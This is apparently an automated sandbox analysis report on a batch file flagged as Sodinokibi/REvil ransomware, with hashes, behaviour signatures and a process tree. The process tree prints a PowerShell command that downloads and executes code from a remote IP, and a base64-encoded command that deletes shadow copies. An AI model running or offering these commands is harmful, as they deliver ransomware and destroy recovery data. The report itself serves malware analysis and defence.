Overview

overview

10

Static

static

4jD1biG2.bat

windows7_x64

10

4jD1biG2.bat

windows10_x64

10

Analysis

  • max time kernel
    115s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7v191014
  • submitted
    10-02-2020 21:10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    4jD1biG2.bat

  • Size

    191B

  • MD5

    6097db04a430a1a65515bae911e13c6e

  • SHA1

    41f39ba8f63c6ff8067348f596155beb32c45f17

  • SHA256

    5743310e1c2bd52d3abf50fa874a206e42a4aac4e182447e99f3cf32be4334ed

  • SHA512

    22fd4f652757e39fca2fa7b8a5d51cf951b76b200764b0ad45aa01cd38f9cbfb63df5542f08606fc198857cdecf1e4fd14d1cd005805203469b9dbb9a52ed777

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/4jD1biG2

Extracted

Language
ps1
Source

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

    ransomwaresodinokibi
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
    ransomware

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\4jD1biG2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1216
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4jD1biG2');Invoke-PBEESOQZ;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Discovering connected drives
      PID:1312
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1536
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1352

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit